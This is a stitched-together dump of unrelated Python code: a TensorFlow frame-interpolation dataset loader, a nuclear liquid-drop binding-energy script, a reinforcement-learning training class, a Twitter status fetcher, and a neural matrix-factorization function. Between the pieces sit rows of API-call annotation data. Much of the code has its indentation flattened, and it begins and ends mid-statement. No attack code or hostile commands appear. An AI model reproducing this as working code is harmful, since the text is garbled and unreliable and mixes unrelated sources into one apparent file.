'x1': tf.io.decode_image(features['frame_2/encoded'], dtype=tf.float32),
'y': tf.io.decode_image(features['frame_1/encoded'], dtype=tf.float32),
# The fractional time value of frame_1 is not included in our tfrecords,
      # but is always at 0.5. The model will expect this to be specified, so
# we insert it here.
'time': 0.5,
# Store the original mid frame filepath for identifying examples.
'path': features['path'],
}
return output_dict
def _random_crop_images(crop_size: int, images: tf.Tensor,
total_channel_size: int) -> tf.Tensor:
"""Crops the tensor with random offset to the given size."""
if crop_size > 0:
crop_shape = tf.constant([crop_size, crop_size, total_channel_size])
images = tf.image.random_crop(images, crop_shape)
return images
def crop_example(example: tf.Tensor, crop_size: int,
crop_keys: Optional[List[str]] = None):
"""Random crops selected images in the example to given size and keys.
Args:
example: Input tensor representing images to be cropped.
crop_size: The size to crop images to. This value is used for both
height and width.
crop_keys: The images in the input example to crop.
Returns:
Example with cropping applied to selected images.
"""
if crop_keys is None:
crop_keys = ['x0', 'x1', 'y']
channels = [3, 3, 3]
# Stack images along channel axis, and perform a random crop once.
image_to_crop = [example[key] for key in crop_keys]
stacked_images = tf.concat(image_to_crop, axis=-1)
cropped_images = _random_crop_images(crop_size, stacked_images, sum(channels))
cropped_images = tf.split(
cropped_images, num_or_size_splits=channels, axis=-1)
for key, cropped_image in zip(crop_keys, cropped_images):
example[key] = cropped_image
return example
def apply_data_augmentation(
augmentation_fns: Dict[str, Callable[..., tf.Tensor]],
example: tf.Tensor,
augmentation_keys: Optional[List[str]] = None) -> tf.Tensor:
"""Applies random augmentation in succession to selected image keys.
Args:
augmentation_fns: A Dict of Callables to data augmentation functions.
example: Input tensor representing images to be augmented.
augmentation_keys: The images in the input example to augment.
Returns:
Example with augmentation applied to selected images.
"""
if augmentation_keys is None:
    # NOTE: the original source had a redacted placeholder ('<KEY>') here; the frame
    # keys below are assumed, matching the defaults used by crop_example above.
    augmentation_keys = ['x0', 'x1', 'y']
# Apply each augmentation in sequence
augmented_images = {key: example[key] for key in augmentation_keys}
for augmentation_function in augmentation_fns.values():
augmented_images = augmentation_function(augmented_images)
for key in augmentation_keys:
example[key] = augmented_images[key]
return example
def _create_from_tfrecord(batch_size, file, augmentation_fns,
crop_size) -> tf.data.Dataset:
"""Creates a dataset from TFRecord."""
dataset = tf.data.TFRecordDataset(file)
dataset = dataset.map(
_parse_example, num_parallel_calls=tf.data.experimental.AUTOTUNE)
# Perform data_augmentation before cropping and batching
if augmentation_fns is not None:
dataset = dataset.map(
lambda x: apply_data_augmentation(augmentation_fns, x),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
if crop_size > 0:
dataset = dataset.map(
lambda x: crop_example(x, crop_size=crop_size),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
dataset = dataset.batch(batch_size, drop_remainder=True)
return dataset
def _generate_sharded_filenames(filename: str) -> List[str]:
"""Generates filenames of the each file in the sharded filepath.
Based on github.com/google/revisiting-self-supervised/blob/master/datasets.py.
Args:
filename: The sharded filepath.
Returns:
A list of filepaths for each file in the shard.
"""
base, count = filename.split('@')
count = int(count)
return ['{}-{:05d}-of-{:05d}'.format(base, i, count) for i in range(count)]
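# Illustrative example of the expansion above (not part of the original module):
# 'train@3' -> ['train-00000-of-00003', 'train-00001-of-00003', 'train-00002-of-00003']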
def _create_from_sharded_tfrecord(batch_size,
train_mode,
file,
augmentation_fns,
crop_size,
max_examples=-1) -> tf.data.Dataset:
"""Creates a dataset from a sharded tfrecord."""
dataset = tf.data.Dataset.from_tensor_slices(
_generate_sharded_filenames(file))
# pylint: disable=g-long-lambda
dataset = dataset.interleave(
lambda x: _create_from_tfrecord(
batch_size,
file=x,
augmentation_fns=augmentation_fns,
crop_size=crop_size),
num_parallel_calls=tf.data.AUTOTUNE,
deterministic=not train_mode)
# pylint: enable=g-long-lambda
dataset = dataset.prefetch(buffer_size=2)
if max_examples > 0:
return dataset.take(max_examples)
return dataset
@gin.configurable('training_dataset')
def create_training_dataset(
batch_size: int,
file: Optional[str] = None,
files: Optional[List[str]] = None,
crop_size: int = -1,
crop_sizes: Optional[List[int]] = None,
augmentation_fns: Optional[Dict[str, Callable[..., tf.Tensor]]] = None
) -> tf.data.Dataset:
"""Creates the training dataset.
The given tfrecord should contain data in a format produced by
frame_interpolation/datasets/create_*_tfrecord.py
Args:
batch_size: The number of images to batch per example.
file: (deprecated) A path to a sharded tfrecord in <tfrecord>@N format.
Deprecated. Use 'files' instead.
files: A list of paths to sharded tfrecords in <tfrecord>@N format.
crop_size: (deprecated) If > 0, images are cropped to crop_size x crop_size
using tensorflow's random cropping. Deprecated: use 'files' and
'crop_sizes' instead.
crop_sizes: List of crop sizes. If > 0, images are cropped to
crop_size x crop_size using tensorflow's random cropping.
augmentation_fns: A Dict of Callables to data augmentation functions.
Returns:
A tensorflow dataset for accessing examples that contain the input images
'x0', 'x1', ground truth 'y' and time of the ground truth 'time'=[0,1] in a
dictionary of tensors.
"""
if file:
logging.warning('gin-configurable training_dataset.file is deprecated. '
'Use training_dataset.files instead.')
return _create_from_sharded_tfrecord(batch_size, True, file,
augmentation_fns, crop_size)
else:
if not crop_sizes or len(crop_sizes) != len(files):
raise ValueError('Please pass crop_sizes[] with training_dataset.files.')
if crop_size > 0:
raise ValueError(
'crop_size should not be used with files[], use crop_sizes[] instead.'
)
tables = []
for file, crop_size in zip(files, crop_sizes):
tables.append(
_create_from_sharded_tfrecord(batch_size, True, file,
augmentation_fns, crop_size))
return tf.data.experimental.sample_from_datasets(tables)
@gin.configurable('eval_datasets')
def create_eval_datasets(batch_size: int,
files: List[str],
names: List[str],
crop_size: int = -1,
max_examples: int = -1) -> Dict[str, tf.data.Dataset]:
"""Creates the evaluation datasets.
  As opposed to create_training_dataset, this function makes sure that the
examples for each dataset are always read in a deterministic (same) order.
Each given tfrecord should contain data in a format produced by
frame_interpolation/datasets/create_*_tfrecord.py
The (batch_size, crop_size, max_examples) are specified for all eval datasets.
Args:
batch_size: The number of images to batch per example.
files: List of paths to a sharded tfrecord in <tfrecord>@N format.
names: List of names of eval datasets.
crop_size: If > 0, images are cropped to crop_size x crop_size using
tensorflow's random cropping.
    max_examples: If > 0, truncate the dataset to 'max_examples' in length. This
      can be useful for speeding up the evaluation loop when the tfrecord for
      the evaluation set is very large.
Returns:
A dict of name to tensorflow dataset for accessing examples that contain the
input images 'x0', 'x1', ground truth 'y' and time of the ground truth
'time'=[0,1] in a dictionary of tensors.
"""
return {
name: _create_from_sharded_tfrecord(batch_size, False, file, None,
crop_size, max_examples)
for name, file in zip(names, files)
}
| [
"tensorflow.image.random_crop",
"tensorflow.data.TFRecordDataset",
"tensorflow.io.decode_image",
"tensorflow.io.parse_single_example",
"tensorflow.concat",
"tensorflow.constant",
"absl.logging.warning",
"tensorflow.data.experimental.sample_from_datasets",
"tensorflow.io.FixedLenFeature",
"tensorflow.split"
] | [((2435, 2482), 'tensorflow.io.parse_single_example', 'tf.io.parse_single_example', (['sample', 'feature_map'], {}), '(sample, feature_map)\n', (2461, 2482), True, 'import tensorflow as tf\n'), ((4124, 4157), 'tensorflow.concat', 'tf.concat', (['image_to_crop'], {'axis': '(-1)'}), '(image_to_crop, axis=-1)\n', (4133, 4157), True, 'import tensorflow as tf\n'), ((4258, 4320), 'tensorflow.split', 'tf.split', (['cropped_images'], {'num_or_size_splits': 'channels', 'axis': '(-1)'}), '(cropped_images, num_or_size_splits=channels, axis=-1)\n', (4266, 4320), True, 'import tensorflow as tf\n'), ((5540, 5569), 'tensorflow.data.TFRecordDataset', 'tf.data.TFRecordDataset', (['file'], {}), '(file)\n', (5563, 5569), True, 'import tensorflow as tf\n'), ((999, 1053), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.string'], {'default_value': '""""""'}), "((), tf.string, default_value='')\n", (1020, 1053), True, 'import tensorflow as tf\n'), ((1089, 1146), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.string'], {'default_value': '"""jpg"""'}), "((), tf.string, default_value='jpg')\n", (1110, 1146), True, 'import tensorflow as tf\n'), ((1182, 1234), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.int64'], {'default_value': '(0)'}), '((), tf.int64, default_value=0)\n', (1203, 1234), True, 'import tensorflow as tf\n'), ((1269, 1321), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.int64'], {'default_value': '(0)'}), '((), tf.int64, default_value=0)\n', (1290, 1321), True, 'import tensorflow as tf\n'), ((1358, 1412), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.string'], {'default_value': '""""""'}), "((), tf.string, default_value='')\n", (1379, 1412), True, 'import tensorflow as tf\n'), ((1448, 1505), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.string'], {'default_value': '"""jpg"""'}), "((), tf.string, default_value='jpg')\n", (1469, 1505), True, 'import tensorflow as tf\n'), ((1541, 1593), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.int64'], {'default_value': '(0)'}), '((), tf.int64, default_value=0)\n', (1562, 1593), True, 'import tensorflow as tf\n'), ((1628, 1680), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.int64'], {'default_value': '(0)'}), '((), tf.int64, default_value=0)\n', (1649, 1680), True, 'import tensorflow as tf\n'), ((1717, 1771), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.string'], {'default_value': '""""""'}), "((), tf.string, default_value='')\n", (1738, 1771), True, 'import tensorflow as tf\n'), ((1807, 1864), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.string'], {'default_value': '"""jpg"""'}), "((), tf.string, default_value='jpg')\n", (1828, 1864), True, 'import tensorflow as tf\n'), ((1900, 1952), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.int64'], {'default_value': '(0)'}), '((), tf.int64, default_value=0)\n', (1921, 1952), True, 'import tensorflow as tf\n'), ((1987, 2039), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.int64'], {'default_value': '(0)'}), '((), tf.int64, default_value=0)\n', (2008, 2039), True, 'import tensorflow as tf\n'), ((2065, 2119), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['()', 'tf.string'], {'default_value': '""""""'}), "((), tf.string, default_value='')\n", (2086, 2119), True, 'import tensorflow as tf\n'), ((2513, 2578), 
'tensorflow.io.decode_image', 'tf.io.decode_image', (["features['frame_0/encoded']"], {'dtype': 'tf.float32'}), "(features['frame_0/encoded'], dtype=tf.float32)\n", (2531, 2578), True, 'import tensorflow as tf\n'), ((2592, 2657), 'tensorflow.io.decode_image', 'tf.io.decode_image', (["features['frame_2/encoded']"], {'dtype': 'tf.float32'}), "(features['frame_2/encoded'], dtype=tf.float32)\n", (2610, 2657), True, 'import tensorflow as tf\n'), ((2670, 2735), 'tensorflow.io.decode_image', 'tf.io.decode_image', (["features['frame_1/encoded']"], {'dtype': 'tf.float32'}), "(features['frame_1/encoded'], dtype=tf.float32)\n", (2688, 2735), True, 'import tensorflow as tf\n'), ((3294, 3349), 'tensorflow.constant', 'tf.constant', (['[crop_size, crop_size, total_channel_size]'], {}), '([crop_size, crop_size, total_channel_size])\n', (3305, 3349), True, 'import tensorflow as tf\n'), ((3363, 3403), 'tensorflow.image.random_crop', 'tf.image.random_crop', (['images', 'crop_shape'], {}), '(images, crop_shape)\n', (3383, 3403), True, 'import tensorflow as tf\n'), ((8844, 8962), 'absl.logging.warning', 'logging.warning', (['"""gin-configurable training_dataset.file is deprecated. Use training_dataset.files instead."""'], {}), "(\n 'gin-configurable training_dataset.file is deprecated. Use training_dataset.files instead.'\n )\n", (8859, 8962), False, 'from absl import logging\n'), ((9623, 9672), 'tensorflow.data.experimental.sample_from_datasets', 'tf.data.experimental.sample_from_datasets', (['tables'], {}), '(tables)\n', (9664, 9672), True, 'import tensorflow as tf\n')] |
import matplotlib.pyplot as plt
import numpy as np
#returns the binding energy predicted by nuclear liquid drop model
def BE_liquidDrop(N,Z): #N=num of neutrons, Z=num of protons
#num of nucleons
A = N+Z
#physical constants (from Alex's notes, in MeV)
a1 = 15.49
a2 = 17.23
a3 = 0.697
a4 = 22.6
#nuclear liquid drop model
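    #terms: volume (a1*A) - surface (a2*A^(2/3)) - Coulomb (a3*Z^2/A^(1/3)) - asymmetry (a4*(N-Z)^2/A)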
    return a1*A - a2*A**(2./3) - a3*(Z**2)/(A**(1./3)) - a4*(N-Z)**2/A
#finds the neutron dripline
def findDripLine(Z):
#test statement for finding dripline
check = False
#start with symmetric nucleus
N=Z
#iterative search for dripline
while (check == False):
BE_i = BE_liquidDrop(N+1,Z)
BE_f = BE_liquidDrop(N,Z)
Q = BE_f-BE_i
if (Q>0):
return N
else:
N = N+1
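#Illustrative usage (not part of the original script):
#    findDripLine(36) returns the liquid-drop estimate of the neutron dripline for Z=36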
def makeMatCores(Zrange):
Nstart = 0
Nrange = int(2.3*Zrange)
Zstart = 1
mat = np.zeros((Zrange-Zstart,Nrange-Nstart))
for Z in range(Zstart,Zrange):
for N in range(Nstart,Nrange):
            #Q-value for adding one more neutron (same convention as findDripLine)
            BE_i = BE_liquidDrop(N+1,Z)
            BE_f = BE_liquidDrop(N,Z)
            Q = BE_f-BE_i
            if (Q<0):
mat[Z-Zstart, N-Nstart] = 1
else:
mat[Z-Zstart, N-Nstart] = 0
return mat
#plt.matshow(makeMatCores(100,100))
#define range of Z's
Z_low = 2
Z_top = 150
mat = makeMatCores(Z_top)
img2 = plt.imshow(mat,interpolation='nearest',
origin='lower')
plt.show()
#interested in finding the neutron drip line for the range Z=36-44
#Z = range(Z_low, Z_top+1)
#N = []
#
#for z in Z:
# dripline = findDripLine(z)
# print "For", z,"protons, the neutron dripline is",dripline, "neutrons"
# N.append(dripline)
#
#mat = np.zeros((max(Z)+1,max(N)+1))
#
#for i in range(0,len(Z)):
# mat[Z[i],N[i]] = 1
#plt.matshow(mat)
#plt.show()
| [
"numpy.zeros",
"matplotlib.pyplot.imshow",
"matplotlib.pyplot.show"
] | [((1336, 1392), 'matplotlib.pyplot.imshow', 'plt.imshow', (['mat'], {'interpolation': '"""nearest"""', 'origin': '"""lower"""'}), "(mat, interpolation='nearest', origin='lower')\n", (1346, 1392), True, 'import matplotlib.pyplot as plt\n'), ((1412, 1422), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1420, 1422), True, 'import matplotlib.pyplot as plt\n'), ((810, 854), 'numpy.zeros', 'np.zeros', (['(Zrange - Zstart, Nrange - Nstart)'], {}), '((Zrange - Zstart, Nrange - Nstart))\n', (818, 854), True, 'import numpy as np\n')] |
import gym
from gym.spaces import Box
import numpy as np
import torch as T
import rl.environments
from rl.data.buffer import TrajBuffer, ReplayBuffer
# from rl.data.buffer import TrajBuffer, ReplayBufferNP
# def make_env(env_id, seed, idx, capture_video, run_name):
# def thunk():
# print('in thunk')
# env = gym.make(env_id)
# env = gym.wrappers.RecordEpisodeStatistics(env)
# if capture_video:
# if idx == 0:
# env = gym.wrappers.RecordVideo(env, f"videos/{run_name}")
# env = gym.wrappers.ClipAction(env)
# env = gym.wrappers.NormalizeObservation(env)
# env = gym.wrappers.TransformObservation(env, lambda obs: np.clip(obs, -10, 10))
# env = gym.wrappers.NormalizeReward(env)
# env = gym.wrappers.TransformReward(env, lambda reward: np.clip(reward, -10, 10))
# env.seed(seed)
# env.action_space.seed(seed)
# env.observation_space.seed(seed)
# return env
#
# return thunk
class MFRL:
"""
Model-Free Reinforcement Learning
"""
def __init__(self, exp_prefix, configs, seed, device):
# super(MFRL, self).__init__(configs, seed)
# print('init MBRL!')
self.exp_prefix = exp_prefix
self.configs = configs
self.seed = seed
self._device_ = device
def _build(self):
self._set_env()
self._set_buffer()
def _set_env(self):
name = self.configs['environment']['name']
evaluate = self.configs['algorithm']['evaluation']
        # Initialize learning environment
self.learn_env = gym.make(name)
self._seed_env(self.learn_env)
        assert isinstance(self.learn_env.action_space, Box), "Works only with continuous action space"
if evaluate:
            # Initialize evaluation environment
self.eval_env = gym.make(name)
self._seed_env(self.eval_env)
else:
self.eval_env = None
# Spaces dimensions
self.obs_dim = self.learn_env.observation_space.shape[0]
self.act_dim = self.learn_env.action_space.shape[0]
self.act_up_lim = self.learn_env.action_space.high
self.act_low_lim = self.learn_env.action_space.low
def _seed_env(self, env):
env.seed(self.seed)
env.action_space.seed(self.seed)
env.observation_space.seed(self.seed)
def _set_buffer(self):
max_size = self.configs['data']['buffer_size']
device = self._device_
if self.configs['algorithm']['on-policy']:
max_size = self.configs['data']['batch_size']
num_traj = max_size//20
horizon = 1000
self.buffer = TrajBuffer(self.obs_dim, self.act_dim, horizon, num_traj, max_size, self.seed, device)
else:
self.buffer = ReplayBuffer(self.obs_dim, self.act_dim, max_size, self.seed, device)
def initialize_buffer(self, num_traj=400):
# print('Initialize a New Buffer..')
seed = self.seed
device = self._device_
if self.configs['algorithm']['on-policy']:
# num_traj = 40
horizon = 1000
max_size = self.configs['data']['batch_size']
self.buffer = TrajBuffer(self.obs_dim, self.act_dim, horizon, num_traj, max_size, self.seed, device)
def initialize_learning(self, NT, Ni):
max_el = self.configs['environment']['horizon']
o, Z, el, t = self.learn_env.reset(), 0, 0, 0
if Ni < 1: return o, Z, el, t
        print(f'[ Initial exploration ] Starting')
for ni in range(1, Ni+1):
            print(f'[ Initial exploration ] Epoch {ni}')
nt = 0
while nt < NT:
# Random actions
a = self.learn_env.action_space.sample()
o_next, r, d, info = self.learn_env.step(a)
d = True if el == max_el else d # Ignore artificial termination
self.buffer.store_transition(o, a, r, o_next, d)
o = o_next
Z += r
el +=1
t +=1
if d or (el == max_el): o, Z, el = self.learn_env.reset(), 0, 0
nt += 1
return o, Z, el, t
def internact_op(self, n, o, d, Z, el, t):
Nt = self.configs['algorithm']['learning']['epoch_steps']
max_el = self.configs['environment']['horizon']
# a = self.actor_critic.get_action_np(o)
with T.no_grad(): a, log_pi, v = self.actor_critic.get_a_and_v_np(T.Tensor(o))
# print('log_pi: ', log_pi)
o_next, r, d_next, _ = self.learn_env.step(a)
Z += r
el += 1
t += 1
self.buffer.store_transition(o, a, r, d, v, log_pi, el)
if d_next or (el == max_el):
# o_next, Z, el = self.learn_env.reset(), 0, 0
with T.no_grad(): v_next = self.actor_critic.get_v(T.Tensor(o_next)).cpu()
self.buffer.traj_tail(d_next, v_next, el)
# print(f'termination: t={t} | el={el} | total_size={self.buffer.total_size()}')
o_next, d_next, Z, el = self.learn_env.reset(), 0, 0, 0
o, d = o_next, d_next
return o, d, Z, el, t
def internact_opB(self, n, o, Z, el, t):
Nt = self.configs['algorithm']['learning']['epoch_steps']
max_el = self.configs['environment']['horizon']
# a = self.actor_critic.get_action_np(o)
with T.no_grad(): a, log_pi, v = self.actor_critic.get_a_and_v_np(T.Tensor(o))
# print('log_pi: ', log_pi)
o_next, r, d, _ = self.learn_env.step(a)
Z += r
el += 1
t += 1
self.buffer.store(o, a, r, o_next, v, log_pi, el)
o = o_next
if d or (el == max_el):
if el == max_el:
with T.no_grad(): v = self.actor_critic.get_v(T.Tensor(o)).cpu()
else:
# print('v=0')
v = T.Tensor([0.0])
self.buffer.finish_path(el, v)
# print(f'termination: t={t} | el={el} | total_size={self.buffer.total_size()}')
o, Z, el = self.learn_env.reset(), 0, 0
return o, Z, el, t
def internact(self, n, o, Z, el, t):
Nx = self.configs['algorithm']['learning']['expl_epochs']
max_el = self.configs['environment']['horizon']
if n > Nx:
            a = self.actor_critic.get_action_np(o) # Stochastic action | No reparameterization
else:
a = self.learn_env.action_space.sample()
o_next, r, d, _ = self.learn_env.step(a)
d = False if el == max_el else d # Ignore artificial termination
self.buffer.store_transition(o, a, r, o_next, d)
o = o_next
Z += r
el +=1
t +=1
if d or (el == max_el): o, Z, el = self.learn_env.reset(), 0, 0
return o, Z, el, t
def evaluate_op(self):
evaluate = self.configs['algorithm']['evaluation']
if evaluate:
print('[ Evaluation ]')
EE = self.configs['algorithm']['evaluation']['eval_episodes']
max_el = self.configs['environment']['horizon']
EZ = [] # Evaluation episodic return
ES = [] # Evaluation episodic score
EL = [] # Evaluation episodic length
for ee in range(1, EE+1):
print(f' [ Agent Evaluation ] Episode: {ee} ', end='\r')
o, d, Z, S, el = self.eval_env.reset(), False, 0, 0, 0
while not(d or (el == max_el)):
# with T.no_grad(): a, _, _ = self.actor_critic.get_pi(T.Tensor(o))
a = self.actor_critic.get_action_np(o, deterministic=True)
# a = self.actor_critic.get_action_np(o, deterministic=True)
o, r, d, info = self.eval_env.step(a)
Z += r
if self.configs['environment']['type'] == 'mujoco-pddm-shadowhand': S += info['score']
el += 1
EZ.append(Z)
if self.configs['environment']['type'] == 'mujoco-pddm-shadowhand': ES.append(S/el)
EL.append(el)
# if self.configs['environment']['type'] == 'mujoco-pddm-shadowhand':
# for i in range(len(ES)):
# ES[i] /= EL[i]
return EZ, ES, EL
def evaluate(self):
evaluate = self.configs['algorithm']['evaluation']
if evaluate:
print('[ Evaluation ]')
EE = self.configs['algorithm']['evaluation']['eval_episodes']
max_el = self.configs['environment']['horizon']
EZ = [] # Evaluation episodic return
ES = [] # Evaluation episodic score
EL = [] # Evaluation episodic length
for ee in range(1, EE+1):
print(f' [ Agent Evaluation ] Episode: {ee} ', end='\r')
o, d, Z, S, el = self.eval_env.reset(), False, 0, 0, 0
while not(d or (el == max_el)):
# Take deterministic actions at evaluation time
a = self.actor_critic.get_action_np(o, deterministic=True) # Deterministic action | No reparameterization
o, r, d, info = self.eval_env.step(a)
Z += r
if self.configs['environment']['type'] == 'mujoco-pddm-shadowhand': S += info['score']
el += 1
EZ.append(Z)
if self.configs['environment']['type'] == 'mujoco-pddm-shadowhand': ES.append(S/el)
EL.append(el)
# if self.configs['environment']['type'] == 'mujoco-pddm-shadowhand':
# for i in range(len(ES)):
# ES[i] /= EL[i]
return EZ, ES, EL
| [
"gym.make",
"rl.data.buffer.ReplayBuffer",
"torch.Tensor",
"rl.data.buffer.TrajBuffer",
"torch.no_grad"
] | [((1634, 1648), 'gym.make', 'gym.make', (['name'], {}), '(name)\n', (1642, 1648), False, 'import gym\n'), ((1890, 1904), 'gym.make', 'gym.make', (['name'], {}), '(name)\n', (1898, 1904), False, 'import gym\n'), ((2726, 2817), 'rl.data.buffer.TrajBuffer', 'TrajBuffer', (['self.obs_dim', 'self.act_dim', 'horizon', 'num_traj', 'max_size', 'self.seed', 'device'], {}), '(self.obs_dim, self.act_dim, horizon, num_traj, max_size, self.\n seed, device)\n', (2736, 2817), False, 'from rl.data.buffer import TrajBuffer, ReplayBuffer\n'), ((2853, 2922), 'rl.data.buffer.ReplayBuffer', 'ReplayBuffer', (['self.obs_dim', 'self.act_dim', 'max_size', 'self.seed', 'device'], {}), '(self.obs_dim, self.act_dim, max_size, self.seed, device)\n', (2865, 2922), False, 'from rl.data.buffer import TrajBuffer, ReplayBuffer\n'), ((3264, 3355), 'rl.data.buffer.TrajBuffer', 'TrajBuffer', (['self.obs_dim', 'self.act_dim', 'horizon', 'num_traj', 'max_size', 'self.seed', 'device'], {}), '(self.obs_dim, self.act_dim, horizon, num_traj, max_size, self.\n seed, device)\n', (3274, 3355), False, 'from rl.data.buffer import TrajBuffer, ReplayBuffer\n'), ((4497, 4508), 'torch.no_grad', 'T.no_grad', ([], {}), '()\n', (4506, 4508), True, 'import torch as T\n'), ((5468, 5479), 'torch.no_grad', 'T.no_grad', ([], {}), '()\n', (5477, 5479), True, 'import torch as T\n'), ((4558, 4569), 'torch.Tensor', 'T.Tensor', (['o'], {}), '(o)\n', (4566, 4569), True, 'import torch as T\n'), ((4887, 4898), 'torch.no_grad', 'T.no_grad', ([], {}), '()\n', (4896, 4898), True, 'import torch as T\n'), ((5529, 5540), 'torch.Tensor', 'T.Tensor', (['o'], {}), '(o)\n', (5537, 5540), True, 'import torch as T\n'), ((5961, 5976), 'torch.Tensor', 'T.Tensor', (['[0.0]'], {}), '([0.0])\n', (5969, 5976), True, 'import torch as T\n'), ((5832, 5843), 'torch.no_grad', 'T.no_grad', ([], {}), '()\n', (5841, 5843), True, 'import torch as T\n'), ((4933, 4949), 'torch.Tensor', 'T.Tensor', (['o_next'], {}), '(o_next)\n', (4941, 4949), True, 'import torch as T\n'), ((5873, 5884), 'torch.Tensor', 'T.Tensor', (['o'], {}), '(o)\n', (5881, 5884), True, 'import torch as T\n')] |
#!/usr/bin/env python
#Update your .twconfig file on this same directory
#with your own api keys and secrets
#Get them signing up at https://apps.twitter.com
#Install required modules with
#'pip install -r requirements.txt'
import configparser
import os
import sys
import json
import twitter
def jdefault(o):
return o.__dict__
#usage: print(json.dumps(string, default=jdefault))
def main():
#Twitter status id to fetch
statusId = '973464578708316161'
try:
sys.stdout.write('reading config file... ')
config = configparser.RawConfigParser()
config.read('.twconfig')
print('success!')
except:
print('failed to read config file!')
exit()
try:
sys.stdout.write('connecting to api... ')
api = twitter.Api(consumer_key=config.get('keys', 'consumer_key'),
consumer_secret=config.get('keys', 'consumer_secret'),
access_token_key=config.get('keys', 'access_key'),
access_token_secret=config.get('keys', 'access_secret'))
print('success!')
except Exception as e:
print('failed to connect to twitter api!')
print(e)
exit()
try:
sys.stdout.write('fetching status %s... ' % statusId )
status = api.GetStatus(statusId)
print('success!')
except:
print('failed to get status!')
exit()
try:
print('writing to file out.txt... ')
with open(statusId + '.txt', 'w') as outfile:
statusparsed = json.loads(str(status).encode())
outfile.write(json.dumps(status, default=jdefault) + '\n')
sys.stdout.write('Created at: ' + statusparsed['created_at'])
outfile.closed
except:
print('failed writing to file!')
exit()
if __name__ == "__main__":
main()
| [
"sys.stdout.write",
"configparser.RawConfigParser",
"json.dumps"
] | [((477, 520), 'sys.stdout.write', 'sys.stdout.write', (['"""reading config file... """'], {}), "('reading config file... ')\n", (493, 520), False, 'import sys\n'), ((532, 562), 'configparser.RawConfigParser', 'configparser.RawConfigParser', ([], {}), '()\n', (560, 562), False, 'import configparser\n'), ((675, 716), 'sys.stdout.write', 'sys.stdout.write', (['"""connecting to api... """'], {}), "('connecting to api... ')\n", (691, 716), False, 'import sys\n'), ((1076, 1129), 'sys.stdout.write', 'sys.stdout.write', (["('fetching status %s... ' % statusId)"], {}), "('fetching status %s... ' % statusId)\n", (1092, 1129), False, 'import sys\n'), ((1446, 1507), 'sys.stdout.write', 'sys.stdout.write', (["('Created at: ' + statusparsed['created_at'])"], {}), "('Created at: ' + statusparsed['created_at'])\n", (1462, 1507), False, 'import sys\n'), ((1398, 1434), 'json.dumps', 'json.dumps', (['status'], {'default': 'jdefault'}), '(status, default=jdefault)\n', (1408, 1434), False, 'import json\n')] |
import tensorflow as tf
def neural_mf(user_input, item_input, y_, num_users, num_items, embed_partitioner=None):
embed_dim = 8
layers = [64, 32, 16, 8]
learning_rate = 0.01
with tf.compat.v1.variable_scope('nmf', dtype=tf.float32):
with tf.device('/cpu:0'):
User_Embedding = tf.compat.v1.get_variable(name="user_embed", shape=(
num_users, embed_dim + layers[0] // 2), initializer=tf.random_normal_initializer(stddev=0.01), partitioner=embed_partitioner)
Item_Embedding = tf.compat.v1.get_variable(name="item_embed", shape=(
num_items, embed_dim + layers[0] // 2), initializer=tf.random_normal_initializer(stddev=0.01), partitioner=embed_partitioner)
user_latent = tf.nn.embedding_lookup(User_Embedding, user_input)
item_latent = tf.nn.embedding_lookup(Item_Embedding, item_input)
W1 = tf.compat.v1.get_variable(name='W1', shape=(
layers[0], layers[1]), initializer=tf.random_normal_initializer(stddev=0.1))
W2 = tf.compat.v1.get_variable(name='W2', shape=(
layers[1], layers[2]), initializer=tf.random_normal_initializer(stddev=0.1))
W3 = tf.compat.v1.get_variable(name='W3', shape=(
layers[2], layers[3]), initializer=tf.random_normal_initializer(stddev=0.1))
W4 = tf.compat.v1.get_variable(name='W4', shape=(
embed_dim + layers[3], 1), initializer=tf.random_normal_initializer(stddev=0.1))
with tf.device('/gpu:0'):
mf_user_latent, mlp_user_latent = tf.split(
user_latent, [embed_dim, layers[0] // 2], 1)
mf_item_latent, mlp_item_latent = tf.split(
item_latent, [embed_dim, layers[0] // 2], 1)
mf_vector = tf.multiply(mf_user_latent, mf_item_latent)
mlp_vector = tf.concat((mlp_user_latent, mlp_item_latent), 1)
fc1 = tf.matmul(mlp_vector, W1)
relu1 = tf.nn.relu(fc1)
fc2 = tf.matmul(relu1, W2)
relu2 = tf.nn.relu(fc2)
fc3 = tf.matmul(relu2, W3)
relu3 = tf.nn.relu(fc3)
concat_vector = tf.concat((mf_vector, relu3), 1)
y = tf.reshape(tf.matmul(concat_vector, W4), (-1,))
loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=y, labels=y_)
loss = tf.reduce_mean(loss)
y = tf.sigmoid(y)
optimizer = tf.compat.v1.train.GradientDescentOptimizer(
learning_rate)
return loss, y, optimizer
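# Illustrative usage sketch (assumed shapes/values, not part of the original module):
#   user_ids = tf.constant([0, 1, 2]); item_ids = tf.constant([3, 4, 5])
#   labels = tf.constant([1.0, 0.0, 1.0])
#   loss, y_prob, opt = neural_mf(user_ids, item_ids, labels, num_users=10, num_items=10)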
| [
"tensorflow.nn.relu",
"tensorflow.compat.v1.variable_scope",
"tensorflow.nn.embedding_lookup",
"tensorflow.device",
"tensorflow.reduce_mean",
"tensorflow.concat",
"tensorflow.nn.sigmoid_cross_entropy_with_logits",
"tensorflow.compat.v1.train.GradientDescentOptimizer",
"tensorflow.multiply",
"tensorflow.matmul",
"tensorflow.random_normal_initializer",
"tensorflow.split",
"tensorflow.sigmoid"
